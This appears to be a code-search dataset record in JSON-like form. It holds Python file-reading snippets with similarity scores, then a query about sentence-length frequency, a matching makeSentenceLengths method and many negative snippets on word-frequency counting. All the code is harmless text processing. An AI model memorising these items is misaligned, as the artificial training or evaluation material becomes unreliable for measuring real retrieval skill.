convert_file_extension_to_txt(image_file):\n\treturn image_file.split('.')[0] + '.txt'", "def readfile(filename):\n with open(filename, encoding=\"utf-8\") as file:\n raw = file.read()\n return raw", "def _read_data(self, txtfile):\n data_string = open(txtfile,'r').read()\n return data_string", "def read_file(name):\n with open(name, 'r') as my_file:\n return my_file.read().encode('utf-8')", "def read_file(file):\n with open(file, \"r\") as fid:\n return fid.read()", "def read_file(self, file_name: str)-> str:\n if not os.path.exists(file_name):\n raise IOError(\"The File {} doesn't exists!\".format(file_name))\n\n with open(file_name) as file:\n return file.read().strip()", "def getFileContent(fileName, encoding = \"UTF-8\"):\n file = io.open(fileName, mode = \"r\", encoding = encoding)\n text = file.read()\n file.close()\n return text", "def _read_file(fname):\n with open(fname) as fobj:\n for line in fobj:\n yield _tostr(line).strip()", "def read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read().strip()", "def _readfile(dirpath, filename):\n try:\n with codecs.open(os.path.join(dirpath, filename), \"r\", \"utf-8\") as f:\n return f.read()\n except IOError:\n return u\"\"", "def read_file(filename):\n fh = open(filename, \"r\")\n file_str = fh.read()\n file_str = re.sub(\"$\\n\", \"\", file_str)\n fh.close()\n return file_str", "def _(fname: str) -> str:\n with open(os.path.join(os.getcwd(), fname)) as readme:\n content = readme.read() or '' # prevent ``content = None``\n return content", "def read_file(file_path):\n\n text = ''\n with open(file_path, 'r') as file:\n for line in file.readlines():\n text += line\n return text", "def read_file(filename=\"\"):\n with open(filename, 'r') as f:\n f_contents = f.read()\n print(f_contents, end='')", "def get_file_content(filename):\n file_contents = ''\n with open(filename) as f:\n file_contents = f.read()\n return file_contents", "def read_file(filename=\"\"):\n with open(filename, 'r', encoding='utf-8') as fl:\n print(fl.read(), 
end='')", "def read_file(file_path, mode='r', encoding=\"utf-8\"):\n with codecs.open(file_path, mode, encoding=encoding) as fp:\n return fp.read().strip()", "def readText(fileName):\n fileText = \"\"\n with open(fileName,\"r\") as fileObject:\n fileText = fileObject.read()\n \n return fileText", "def slurp(path):\n with open(path) as f:\n return f.read().strip()", "def unifyString(cls, fileArray):\n string = \"\"\n for i, v in enumerate(fileArray):\n string = string + chr(v)\n return string", "def load_text(filename):\n\n return \" \".join(list(\n map(\n lambda word: word.strip(), open(filename))))", "def read_file(file_path):\n with open(file_path, 'r') as infile:\n return infile.read()", "def open_and_read_file():\n\n file_path = sys.argv[1]\n input_file = open(file_path).read()\n return input_file\n\n # your code goes here\n\n #return \"This should be a variable that contains your file text as one long string\"", "def citeste_fisier(path: str) -> str:\n file_object = open(path, mode=\"rt\")\n file_content = file_object.read()\n return file_content", "def txt2txt(fname, skip=None):\n with codecs.open(fname, 'r', encoding='utf-8') as f_in:\n content = f_in.read()\n\n\tcontent.replace('\\r', '').replace('\\x0C', '')\n\n return content", "def read_file(filename=\"\"):\n\n with open(filename, encoding=\"utf-8\") as n:\n print(n.read(), end=\"\")", "def read_file(file):\n f = open(file, \"r\", encoding=\"utf8\")\n return f.read()", "def read_file(filename=\"\"):\n\n with open(filename, 'r') as f:\n read_data = f.read()\n\n print('{:s}'.format(read_data), end='')\n\n f.closed", "def read_file(filename: str, mode: str = \"r\") -> str:\n with open(filename, mode) as file:\n file_content = file.read()\n return file_content", "def vtt_to_srt(str_name_file: str):\n file_contents: str = read_text_file(str_name_file)\n str_data: str = \"\"\n str_data = str_data + convert_content(file_contents)\n str_name_file: str = str_name_file.replace(\".vtt\", \".srt\")\n print(str_name_file)\n file_create(str_name_file, str_data)", "def read_from_file(file_name):\n with open(file_name, \"rb\") as text_file:\n return text_file.read()", "def convert_file(fname):\n md = markdown.Markdown(extensions=['extra'], tab_length=2)\n with open(fname, \"r\") as f:\n content = ''.join(f.readlines())\n return md.convert(content)", "def get_HTML(file):\r\n\r\n f = open(file, 'r')\r\n lines = f.readlines()\r\n f.close()\r\n return \"\".join(lines)", "def prepare_file(lines):\n return \" \".join(line.strip() for line in lines)", "def read_file(filename=\"\"):\n with open(filename, 'r', encoding='utf-8') as fi:\n print(fi.read(), end=\"\")" ]
[ "0.8525866", "0.7717556", "0.77115536", "0.7649846", "0.7578865", "0.7578865", "0.7481903", "0.7253718", "0.70882875", "0.708055", "0.704386", "0.67967176", "0.677502", "0.67743015", "0.67640656", "0.6590976", "0.65571094", "0.64584035", "0.64482987", "0.6414025", "0.64015496", "0.6323589", "0.62894565", "0.62592614", "0.624228", "0.61986595", "0.6193674", "0.61897534", "0.618773", "0.61519", "0.61384267", "0.6134697", "0.61128557", "0.6106033", "0.61049736", "0.6092583", "0.6092583", "0.6080453", "0.6079707", "0.60780084", "0.60706997", "0.60586476", "0.6056987", "0.60315025", "0.6027354", "0.6014972", "0.60089856", "0.5999898", "0.59846383", "0.5981039", "0.5965841", "0.5965305", "0.594827", "0.5941301", "0.5934368", "0.5934237", "0.59339166", "0.5924755", "0.592462", "0.59087044", "0.59046143", "0.5902484", "0.5898166", "0.58962375", "0.5889131", "0.5877632", "0.5875565", "0.58732295", "0.5856612", "0.58473486", "0.5846714", "0.58426905", "0.5841077", "0.58339155", "0.5828111", "0.58229584", "0.5822674", "0.58197117", "0.58009696", "0.5789374", "0.57869714", "0.57833743", "0.5779865", "0.576917", "0.57638127", "0.57531434", "0.57422173", "0.5741138", "0.5740983", "0.5734529", "0.57289386", "0.57244927", "0.57229257", "0.5719035", "0.5715653", "0.5690626", "0.56874865", "0.5685678", "0.5681482", "0.5680778", "0.567191" ]
0.0
-1
takes str from self.text and creates dict of sentence length freq.
def makeSentenceLengths(self):
    count = 0
    LoW = self.text.split()
    list = []
    for x in range(len(LoW)):
        if '.' in LoW[x] or '?' in LoW[x] or '!' in LoW[x]:
            length = x
            list += [len(LoW[count: x+1])]
            count = length + 1
    for x in list:
        if x not in self.sentencelengths:
            self.sentencelengths[x] = 1
        else:
            self.sentencelengths[x] += 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_freq_dict(text):\n freq_dict = {}\n for i in text:\n if i not in freq_dict:\n freq_dict[i] = 1\n else:\n freq_dict[i] += 1\n return freq_dict", "def make_frequency_dict(self, text):\n\t\t\tfrequency = {}\n\t\t\t#tomamos los numeros como caracteres entonces el diccionario solo tendra un rango (0,9) las ',' y '\\n'\n\t\t\tfor character in text:#O(len(row)*columns) \n\t\t\t\tif not character in frequency:#como frequency es un diccionario es de O(1)\n\t\t\t\t\tfrequency[character] = 0\n\t\t\t\tfrequency[character] += 1\n\t\t\t\n\t\t\treturn frequency", "def create_freq_dict(corpus, doc_info):\n for idx, content in enumerate(corpus):\n word_freq_table = {}\n splitted_sentence = content.split()\n for word in splitted_sentence:\n word = word.lower()\n if word not in word_freq_table:\n word_freq_table[word] = 1\n else:\n word_freq_table[word] += 1\n doc_info[idx]['freq_dict'] = word_freq_table", "def build_frequency_dict(text: bytes) -> Dict[int, int]:\n freq_dic = {}\n for elem in text:\n if elem not in freq_dic:\n freq_dic[elem] = 1\n else:\n freq_dic[elem] += 1\n return freq_dic", "def word_lengths(sentence):\n\n word_count_dict = {}\n sentence = sentence.split()\n\n for word in sentence:\n length = len(word)\n if length not in word_count_dict:\n word_count_dict[length] = {word}\n else:\n set = word_count_dict[length]\n set.add(word)\n\n return word_count_dict", "def text2wordfreq(string, lowercase=False):\r\n\r\n\r\n from collections import Counter\r\n lst = Counter(tokenize(string, lowercase)).most_common()\r\n\r\n dictLst = dict(lst)\r\n\r\n return dictLst", "def word_frequency_table(self, text_string):\r\n stopWords = set(stopwords.words(\"english\"))\r\n words = word_tokenize(text_string)\r\n ps = PorterStemmer()\r\n\r\n freqTable = dict()\r\n for word in words:\r\n word = ps.stem(word)\r\n if word in stopWords:\r\n continue\r\n if word in freqTable:\r\n freqTable[word] += 1\r\n else:\r\n freqTable[word] = 1\r\n\r\n return freqTable", "def wordFreq(parseThis):\n \n freq = {}\n nono = ('\"', \"'\", '%', '$', '!', '.', '?', '-', ','\n , '\\n', '\\t', '\\r', ':', ';')\n\n for c in nono:\n parseThis = parseThis.replace(c, \" \")\n \n words = parseThis.split()\n \n for word in words:\n temp = word.lower()\n freq[temp] = freq.get(temp, 0) + 1\n\n return freq", "def word_frequency():\n\n song = open(\"data/yellow_submarine.txt\")\n d = dict()\n for line in song:\n line = line.strip()\n line = line.lower()\n punctuations = \"\"\"!()-[]{};:'\"\\,<>./?@#$%^&*_~\"\"\" # remove punctuation https://www.programiz.com/python-programming/examples/remove-punctuation\n no_punct = \"\" # remove punctuation\n for char in line: # remove punctuation\n if char not in punctuations: # remove punctuation\n no_punct = no_punct + char # remove punctuation\n words = line.split(\" \")\n for word in words:\n d[word] = d.get(word, 0) + 1\n return d", "def frequency(self):\n # BEGIN\n \n freq = {} \n # for word in my_list:\n # for letter in word:\n # keys=freq.keys()\n # if letter in keys:\n # freq[letter]+=1\n # else:\n # freq[letter]=1\n # return freq\n\n whole = ''.join(WordSet(self.text).words())\n \n for m in whole:\n if m in freq:\n freq[m] += 1\n else:\n freq[m] = 1\n return freq\n # END", "def find_frequency(text, n=1):\n freqs = {}\n length = len(text)\n for i in xrange(0, length):\n upper = i+n\n if upper > length:\n break\n gram = text[i:upper]\n dict_operate(freqs, gram, 1, operator.add)\n return freqs", "def count(self):\n freq = {}\n\n for desc in self.words:\n if desc in freq:\n freq[desc] += 
1\n else:\n freq[desc] = 1\n\n return freq", "def make_word_to_freq(self):\n\t\tword_to_freq = {}\n\t\tdocuments = self.tokenized_documents[\"train\"]\n\t\tfor document in documents:\n\t\t\tfor word in document:\n\t\t\t\tif not word in self.worddict: # make sure we have not found one of the pre-defined words\n\t\t\t\t\tword_to_freq[word] = word_to_freq.get(word, 0) + 1\n\t\t\n\t\treturn word_to_freq", "def _count_word_frequency(self, data):\n _dict = {}\n for _docs in data:\n for _word in _docs:\n if _word in _dict:\n _dict[_word] += 1\n else:\n _dict[_word] = 1\n return _dict", "def get_sentence_score(sentences, word_frequencies):\r\n sentence_scores = dict()\r\n for sent in sentences:\r\n word_count_without_stopwords=0\r\n for word in word_tokenize(sent.lower()):\r\n if word in word_frequencies.keys():\r\n word_count_without_stopwords+=1 \r\n if len(sent.split(' ')) < 30:\r\n if sent not in sentence_scores.keys():\r\n sentence_scores[sent] = word_frequencies[word]\r\n else:\r\n sentence_scores[sent] += word_frequencies[word]\r\n \r\n if sent in sentence_scores:\r\n sentence_scores[sent] = sentence_scores[sent]/word_count_without_stopwords\r\n \r\n print(sentence_scores) \r\n return sentence_scores", "def words(text):\n clean = TextBlob(clean(text))\n sentence_count = len(clean.sentences)\n words = clean.tokenize()\n word_count = len(words)\n avg_len = np.mean([len(word) for word in words])\n words_dict = {'sentence_count': sentence_count, 'word_count': word_count,\n 'avg_len': avg_len}\n return words_dict", "def word_frequency(a_string):\n\n for char in \"\"\".$#,:\"'?!)(\"\"\":\n a_string = a_string.replace(char, \"\")\n for char in \"\"\"-\"\"\":\n a_string = a_string.replace(char, \" \")\n\n cleanstring = a_string.lower()\n a_list = cleanstring.split()\n a_dict = {}\n for item in a_list:\n if item in a_dict:\n a_dict[item]+= 1\n else:\n a_dict[item] = 1\n return a_dict", "def parse_text(self, text, wordcount_dictionary=None):\n if not wordcount_dictionary:\n wordcount_dictionary = {}\n words = self.parse_regexp.findall(text)\n for word in words:\n new_word = stem(word.lower())\n if new_word not in self.stopwords:\n if new_word in wordcount_dictionary:\n wordcount_dictionary[new_word] += 1\n else:\n wordcount_dictionary[new_word] = 1\n return wordcount_dictionary", "def word_count(self, document):\n start_time = time.time()\n dictionary = dict()\n counter = defaultdict(int)\n for line in document.splitlines():\n for word in line.split():\n if word not in PUNCTUATION_MARK:\n counter[word] += 1\n for word, cnt in sorted(counter.items(), key=lambda x: (-x[1], x[0])):\n dictionary[word] = cnt\n self.log.info(\"Duration count dictionary: {duration}\".format(duration=float(time.time() - start_time)))\n return dictionary", "def task1(sentence):\n split_sentence = sentence.split()\n dictionary = dict()\n for word in split_sentence:\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n for item in dictionary:\n print(\"Word \" + item + \" used \" + str(dictionary[item]) + \" times\")\n return dictionary", "def _count_words_in_string(self, sentence):\n word_count = dict()\n for i in sentence:\n if word_count.get(i) is None:\n word_count[i] = 1\n else:\n word_count[i] = word_count.get(i)+1\n\n return word_count", "def create_freq_dict(sents, lang):\n ix = 0\n freq_dict_all = []\n stop_words = set(stopwords.words(lang))\n\n for sent in sents:\n ix += 1\n freq_dict = {}\n words = word_tokenize(sent)\n\n for word in words:\n word = word.lower()\n if word not in 
stop_words:\n if word in freq_dict:\n freq_dict[word] += 1\n else:\n freq_dict[word] = 1\n\n temp = {\n 'doc_id': ix,\n 'freq_dict': freq_dict\n }\n\n freq_dict_all.append(temp)\n\n return freq_dict_all", "def letter_freq( text ):\n\tchars = string.ascii_uppercase\n\ttext = text.upper()\n\tresult = get_letter_dict()\n\ttotal = 0\n\tfor char in chars:\n\t\tcount = text.count(char)\n\t\tresult[char] = count\n\t\ttotal += count\n\tif total != 0:\n\t\tfor char in chars:\n\t\t\tresult[char] = (result[char]*10000 / total) / float(100)\n\treturn result", "def calculate_frequencies(cipher_text: str) -> dict:\n cipher_frequencies = dict()\n for character in cipher_text:\n try:\n cipher_frequencies[character] += 1\n except KeyError:\n cipher_frequencies[character] = 1\n \n return cipher_frequencies", "def get_word_freq_dict(df_col):\n results = Counter()\n df_col.str.lower().str.split().apply(results.update)\n results = sorted(results.items(), key=lambda item: item[1], reverse=True)\n d = {}\n for word, freq in results:\n d[word] = freq\n return d", "def frequency(self, path, filemoving, parser):\n root = parser.parsing_xml(path, filemoving)\n root_tag = root.tag[0:(root.tag.find('}') + 1)]\n list_of_words = []\n for i in root.iter(root_tag + 'p'):\n if str(type(i.text)) == \"<class 'str'>\":\n for word in i.text.split():\n alphanumeric_filter = filter(str.isalnum, word)\n alphanumeric_string = \"\".join(alphanumeric_filter)\n list_of_words.append(alphanumeric_string)\n dict_of_frequency = collections.Counter(list_of_words)\n return dict_of_frequency", "def make_freq_dict(word_list):\n\n\tfreq_dict = {}\n\n\tfor word in word_list: #need to slice each tale into a list of words for this to work\n\t\tif word in freq_dict:\n\t\t\tcurrent_val = freq_dict.get(word)\n\t\t\tval = current_val + 1\n\t\t\tfreq_dict[word] = val #made a dictionary of the string (word, frequnecy)\n\t\telse: #if it isn't in the dictionary\n\t\t\tfreq_dict[word] = 1\n\treturn freq_dict", "def letter_freq(txt):\n frequencies = {}\n txt_lower = txt.lower()\n\n for i in txt_lower:\n keys = frequencies.keys()\n if i in keys:\n frequencies[i] += 1\n else:\n frequencies[i] = 1\n return frequencies", "def frequencies(self):\n dic = {}\n for word in self.words():\n dic[word] = dic.get(word, 0) + 1\n return dic", "def calculate_ngram_frequencies(text, n):\n\n import re\n\n # Create a new dictionary\n ngram_dict = {}\n\n # Find all sentences\n sentences_list = re.findall(r'[^\\.\\?!\"]+', text)\n\n # Iterate over sentences in the list\n for sentence in sentences_list:\n # Split words by a whitespace character\n words_list = sentence.rsplit()\n\n # Iterate over ngrams in the sentence\n for i in range(len(words_list) - n + 1):\n\n # Join the words to size of n\n ngram = ' '.join(words_list[i:i + n])\n\n # Record the presence of a new ngram\n if not ngram in ngram_dict:\n ngram_dict[ngram] = 1\n\n # Add the number of occurrence of the ngram\n elif ngram in ngram_dict:\n ngram_dict[ngram] += 1\n\n return ngram_dict", "def count_word_in_each_sentence(sentence):\n\tsentence = sentence.lower()\n\twords = sentence.split()\n\tcount_dict = dict()\n\tfor _ in words:\n\t\tif count_dict.get(_):\n\t\t\tcount_dict[_] += 1\n\t\telse:\n\t\t\tcount_dict[_] = 1\n\treturn count_dict", "def word_frequency_dict(tokens):\n\n\tfdist = FreqDist(tokens) \t\t\t\t\t\t# fdist.keys() fdist.values()\n\treturn dict(fdist)", "def word_frequencies(word_list: TextIO) -> dict:\n words = word_list.read().split(' ')\n amount_of_words = len(set(words))\n frequencies = {}\n for 
index, word in enumerate(words):\n clean_word = remove_punctuation(word)\n if clean_word not in frequencies:\n frequencies[clean_word] = (index + 1) / amount_of_words\n del frequencies[\"\"]\n return frequencies", "def word_freq(word, ngram_dict):\n word = word.lower()\n return ngram_dict[word] if word in ngram_dict else 0", "def word_frequency(seq):\n\n # Initializes an emtpy hash map from HashMap class\n hash_map = HashMap()\n\n # For each word (not unique) in sequence\n for word in seq:\n\n # if that word is already in hash map\n if word in hash_map:\n\n # Increment value for that word\n hash_map[word] += 1\n\n # if word not yet in hash map\n else:\n\n # set count value for word equal to one\n hash_map[word] = 1\n\n # return filled hash map from sequence, words and words counts\n return hash_map", "def get_wordcount(text):\r\n\r\n characters = len(text)\r\n chars_no_spaces = sum([not x.isspace() for x in text])\r\n asian_chars = sum([is_asian(x) for x in text])\r\n non_asian_words = nonj_len(text)\r\n words = non_asian_words + asian_chars\r\n \r\n return dict(characters=characters,\r\n chars_no_spaces=chars_no_spaces,\r\n asian_chars=asian_chars,\r\n non_asian_words=non_asian_words,\r\n words=words)", "def convert_word_to_count(counter={}, doc=[]):\n for sentence in doc:\n for word in sentence.split():\n if word not in counter:\n counter[word] = 1\n else:\n counter[word] += 1\n return counter", "def frequencies(corpus, index, to_lower=False):\n freq = {}\n for sentence in corpus.get_sentences():\n for word in sentence:\n key = word[index]\n if to_lower:\n key = key.lower()\n if key in freq:\n freq[key] += 1\n else:\n freq[key] = 1\n\n return freq", "def mapWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n return token_map", "def lyrics_to_frequencies(lyrics):\n lyricsDictionary = dict()\n for each_word in lyrics:\n if each_word in lyricsDictionary:\n lyricsDictionary[each_word] += 1\n else:\n lyricsDictionary[each_word] = 1\n return lyricsDictionary", "def dictify(words):\n word_freq = {}\n for word in words:\n if word:\n key = word.lower()\n if key in word_freq:\n word_freq[key] += 1\n else:\n word_freq[key] = 1\n else:\n pass\n return word_freq", "def info(doc):\n\tinfo = {}\n\tinfo['sentences'] = [str(sent) for sent in doc.sents]\n\t#sentences : [sent1, sent2, ...]\n\tinfo['tokens'] = [str(token) for token in doc]\n\t#all tokens in info['tokens']\n\ttoken_vals = {}\n\tfor token in info['tokens']:\n\t\tcurrent_word = token\n\t\ti = 0\n\t\tcurrent_sent = info['sentences'][i]\n\t\tfor i in range(len(info['sentences'])): #for each sentence\n\t\t\tval = current_sent.count(str(current_word))\n\t\t\t#value is the number of times the current word is in the current sent\n\t\t\ttoken_vals[str(token)] = val\n\t\t\t#append to dictionary\n\tinfo['token_vals'] = token_vals\n\t#given a word and a sentence, val is how many times it appears in that sentence\n\treturn info", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def word_count(phrase):\n word_dict = {}\n\n for word in phrase.split():\n word_dict[word] = word_dict.get(word, 0) + 1\n\n return word_dict", "def create_word_score(self):\n word_freq = {}\n word_deg = {}\n for zettel in self.lemma_tokens:\n for 
word in zettel:\n word_list = re.split(\" \", word[0])\n word_list_deg = len(word_list) - 1\n for new_word in word_list:\n word_freq.setdefault(new_word, 0)\n word_freq[new_word] = word_freq[new_word] + 1\n word_deg.setdefault(new_word, 0)\n word_deg[new_word] = word_deg[new_word] + word_list_deg\n word_score = {}\n for word in word_freq:\n word_deg[word] = word_deg[word] + word_freq[word]\n word_score.setdefault(word, 0)\n word_score[word] = word_deg[word] / (word_freq[word] * 1.0)\n return word_score", "def word_count(input_str):\n counts = dict()\n words = input_str.split()\n for word in words:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n\n return counts", "def generate_frequency_map(data: str) -> Dict[str, int]:\n seperators: Final[List[str]] = [\n ',', '.', '\\n', ' ', '\\t', '?', '<', '>', '!', ':', ';'\n ]\n tokens: List[str] = tokenize(data, seperators)\n\n frequency_map: Dict[str, int] = {}\n for token in tokens:\n if token in frequency_map.keys():\n frequency_map[token] += 1\n else:\n frequency_map[token] = 1\n return frequency_map", "def calc_weighted_frequency(words,ps,lem,stopWords,text_string):\r\n \r\n\r\n word_frequencies = dict()\r\n for word in words:\r\n word = ps.stem(word)\r\n word = lem.lemmatize(word)\r\n print(word)\r\n if word not in stopWords:\r\n if word not in word_frequencies:\r\n word_frequencies[word] = 1\r\n else:\r\n word_frequencies[word] += 1\r\n \r\n maximum_frequncy = max(word_frequencies.values())\r\n for word in word_frequencies.keys():\r\n word_frequencies[word] = (word_frequencies[word]/maximum_frequncy) \r\n print(word_frequencies)\r\n return word_frequencies", "def counterFrequency(text):\n dictText = {}\n maxN = 0\n mostFrequent = \"\"\n for item in text:\n if (item not in dictText):\n dictText[item] = 1\n else: \n dictText[item] +=1\n \n if (dictText[item] > maxN):\n mostFrequent = item\n maxN = dictText[item]\n return mostFrequent", "def initialize_document_frequencies():\n global document_frequency\n for term in dictionary:\n document_frequency[term] = len(postings[term])", "def initialize(eng, fre):\n\t# TODO\n t = {}\n t[\"SENTSTART\"] = {\"SENTSTART\":1}\n t[\"SENTEND\"] = {\"SENTEND\":1}\n num_sentences = len(eng)\n for i in range(num_sentences):\n list_eng = eng[i].split(\" \")\n list_fre = fre[i].split(\" \")\n for word_eng in list_eng:\n if word_eng == 'SENTSTART' or word_eng == 'SENTEND':\n continue\n if word_eng not in t:\n t[word_eng] = {}\n for word_fre in list_fre:\n if word_fre in t[word_eng]:\n t[word_eng][word_fre] += 1\n else:\n t[word_eng][word_fre] = 1\n for word_eng in t:\n num = 0\n for word_fre in t[word_eng]:\n num += t[word_eng][word_fre]\n for word_fre in t[word_eng]:\n t[word_eng][word_fre] /= num\n return t", "def histogram(text):\n hist = {}\n\n for char in text.lower():\n if char.isalpha():\n hist[char] = hist.get(char, 0) + 1\n else:\n hist['others'] = hist.get('others', 0) + 1\n return hist", "def _compute_frequencies( word_sent):\n\t\tfreq = defaultdict(int)\n\t\tfor s in word_sent:\n\t\t\tfor word in s:\n\t\t\t\tif word not in _stopwords:\n\t\t\t\t\tfreq[word] += 1\n\t\t\t\t# frequencies normalization and fitering\n\t\treturn freq", "def frequency(text):\n # TODO: change function input to a textfile?\n import collections\n freq = collections.Counter(text)\n # print freq\n return freq", "def freq(word, document):\n return document.split(None).count(word)", "def word_freq(self, word_list):\n hist = {}\n for word in word_list:\n hist[word] = hist.get(word, 0) + 1\n return hist", "def 
get_freqs(self):\n dictionary = {}\n for word in self.word_list:\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n letter_sorted = sorted(dictionary.items(), key=lambda entry: entry[0]) #sorts dictionary into alphabetized tuples\n count_sorted = sorted(letter_sorted, key=lambda seq: seq[1], reverse=True) #sorts alphabetical tuples into count order\n return count_sorted", "def fit(self, text):\n\n if self.lowercase:\n text = text.lower()\n\n print(\"Tokenize sentences...\")\n tokens = word_tokenize(text)\n\n self.words_set_size = len(set(tokens))\n\n print(\"Collecting of ngram counters...\")\n\n self.unigram_counts = Counter(tokens)\n self.bigram_counts = Counter(bigrams(tokens))\n\n return self", "def computeWordFrequencies(self, tokens: ['token'], frequencies: {'token': int}):\n # project2: update this method to take existing dict as parameter and modify it\n # additionally, stopwords are not inserted in the dict;\n # words shorter than 3 character or contains all digits are ignored\n for token in tokens:\n # if the key is not in dict, dict.setdefault method initiates the value at 0\n # if token not in stopwords and len(token) >= 3 and not token.isdigit():\n frequencies[token] = frequencies.setdefault(token, 0) + 1", "def word_frequency( tokenized, dic ):\n print( 'computing word frequencies' )\n start = time.time()\n for i, text in enumerate( tokenized ):\n for token in text:\n if token not in dic:\n dic[ token ] = 1\n else:\n dic[ token ] += 1\n if i % 10000 == 0:\n sys.stdout.write( '\\rprocessed : {}/{} reviews in {}s'.format( i, NO_REVIEWS, time.time() - start ) )\n sys.stdout.write( '\\rprocessed : {}/{} reviews in {}s\\n'.format( i, NO_REVIEWS, time.time() - start ) )", "def frequency(w: str) -> float:\n return frequency_list.get(remove_punctuation(w), 0)", "def analyze_word(s):\n\n a = {}\n a['word'] = s\n a['n_letters'] = len(s)\n a['n_vowels'] = count_vowels(s)\n \n return a", "def loop_through_text(phrase_length):\n\n # get text\n tanach = get_all_text()\n tanach = tanach.split()\n\n results = {}\n\n for index in range(len(tanach)):\n query = ' '.join(tanach[index:index+phrase_length])\n\n if query in results:\n results[query] += 1\n\n else:\n results[query] = 1\n\n return results", "def count_words(self, contents):\n wordCounts = {}\n for i in self.ngramCounts:\n if i == 0: # want the default to be the size of the corpus\n total = 0\n for line in contents:\n words = line.split(\" \")\n words = [ w.strip() for w in words if w] #remove nulls\n for word in words:\n if word:\n total += 1\n wordCounts[i] = defaultdict(lambda: total)\n continue\n else:\n counts = defaultdict(lambda: 0)\n for line in contents:\n words = line.split(\" \")\n words = [ w.strip() for w in words if w] #remove nulls\n for k, word in enumerate(words): \n if k < (i-1) or not word:\n continue\n key = \"\"\n for j in range(k-i+1, k+1):\n key += words[j] + \" \"\n counts[key.strip()] += 1\n wordCounts[i] = counts\n return wordCounts", "def prep_dict(word):\n counts = {}\n for l in word.lower():\n if l!=\" \":\n counts[l] = counts.get(l,0) + 1\n return counts", "def get_ngramlogprobs(freqdict):\n return", "def __init__(self, input_string):\n self.words_to_counts = {}\n self.split_and_populate_words(input_string)", "def count_words(phrase):\n # split the input string at spaces\n phrase_split = phrase.split()\n\n # initiate empty dictionary\n word_count = {}\n\n # iterate over words in the phrase\n for word in phrase_split:\n if word in word_count:\n\n # if the word is already a 
key in the dictionary, increase the value by 1\n word_count[word] += 1\n\n else:\n # if the word is not a key in the dictionary, set its value to 1\n word_count[word] = 1\n\n return word_count", "def term_frequency(ngrams,lang):\n token_dictionary = {}\n for ng in ngrams:\n try:\n token_dictionary[ng] = token_dictionary[ng] + 1\n except KeyError:\n token_dictionary[ng] = 1\n return token_dictionary", "def word_count(input_file, word_freq=None):\n if word_freq is None:\n word_freq = collections.defaultdict(int)\n\n for l in input_file:\n for w in l.strip().split():\n word_freq[w] += 1\n\n return word_freq", "def getFrequencyDict(sequence):\n # freqs: dictionary (element_type -> int)\n \n for x in sequence:\n hand[x] = hand.get(x,0) + 1\n updatehand(hand, word)\n print hand\n print \"freq function\"\n #return hand", "def words(phrase):\n\twordlist = phrase.split()\n\tunique_wordlist = []\n\tword_freq = []\n\n \n\twhile wordlist:\n\t\tword_freq.append(wordlist.count(wordlist[0])) #count the instances of a word and add it to the frequencies list\n\t\tunique_wordlist.append(wordlist[0]) #add the word into a unique words list\n\t\twordlist = list(filter((wordlist[0]).__ne__, wordlist)) #remove all other similar words from the wordlist\n\n\n\tn = len(word_freq)\n\toutput = {}\n\n\tfor i in range(n):\n\t\tif unique_wordlist[i].isdigit(): #convert sting digits into int\n\t\t\tunique_wordlist[i] = int(unique_wordlist[i])\n\t\toutput[unique_wordlist[i]] = word_freq[i] #add the unique words with their corresponding frequencies into the output dict\n\t\n\treturn output", "def make_worddict(self):\n\t\tprint(\"Making word dictionary\")\n\t\tword_to_freq = self.make_word_to_freq()\n\t\twords = list(word_to_freq.keys())\n\t\twords.sort() # sort alphabetically first to avoid non-deterministic ordering of words with the same frequency\n\t\twords.sort(key = lambda x:word_to_freq[x], reverse = True)\n\n\t\tfor word in words[:self.FREQCAP-len(self.worddict)]:\n\t\t\tself.worddict[word] = len(self.worddict)\n\t\t\n\t\tprint(\"Word dictionary size:\", len(self.worddict))", "def count_ngrams(self, corpus):\n \n self.unigramcounts = defaultdict(int)\n self.bigramcounts = defaultdict(int)\n self.trigramcounts = defaultdict(int)\n\n self.sentence_counts = 0\n self.word_count = 0\n\n for line in corpus:\n sequence = line\n self.sentence_counts +=1\n\n unigrams = get_ngrams(sequence, n=1)\n for gram in unigrams:\n self.word_count += 1\n self.unigramcounts[gram] +=1\n\n bigrams = get_ngrams(sequence, n=2)\n for gram in bigrams:\n self.bigramcounts[gram] +=1\n\n trigrams = get_ngrams(sequence, n=3)\n for gram in trigrams:\n self.trigramcounts[gram] +=1\n\n #self.unigramcounts[('START')] = self.sentence_counts *2\n self.bigramcounts[('START', 'START')] = self.sentence_counts\n\n #return self", "def word_count(phrase):\n words = phrase.split()\n deDupedWords = set(words)\n wordCount = {}\n\n for element in deDupedWords:\n wordCount.update({element: words.count(element)})\n\n return wordCount", "def stats_text_en(text):\n text1 = text.replace(',','').replace('.','').replace('--','').replace('*','').replace('!','') # Remove the non-English characters in the text.\n text2 = text1.split() # Convert the string type to the list type.\n dict = {x: text2.count(x) for x in text2} # Count the times of each word in the list.\n dict1= sorted(dict.items(), key= lambda d:d[1], reverse = True) # Sort the words in the descending order according to the times of words.\n print(dict1) # Return the result.", "def build_tf_dict(self, 
sentences):\n tf_dict = defaultdict(int)\n for sentence in sentences:\n for word in sentence:\n tf_dict[word] += 1\n return tf_dict", "def loop_through_text(phrase_length):\n\n # get text\n tanach = get_all_text()\n tanach = tanach.split()\n\n results = {}\n\n for index in xrange(len(tanach)):\n query = ' '.join(tanach[index:index+phrase_length])\n\n if query in results:\n results[query] += 1\n\n else:\n results[query] = 1\n\n return results", "def frequencyAnalysis(article, dictionary):\r\n string = article #Sets the string to the article\r\n string = re.sub(\"[^a-zA-Z0-9’\\s]+\",'', string) #Takes the articles and removes all characters appart from apostrophes, spaces, digits, and leters\r\n string = re.sub(\"’\", \"'\", string) #Replaces ’ with '\r\n string = string.lower() #Ensures that all the charcters are lower case\r\n stringList = string.split() #Takes the article and turns it into a list\r\n \r\n print(\"\\nConverted article to list\\n\")\r\n \r\n print(\"Starting frequency analysis\\n\")\r\n\r\n #Started the frequency anaylsis\r\n for word in stringList:\r\n if 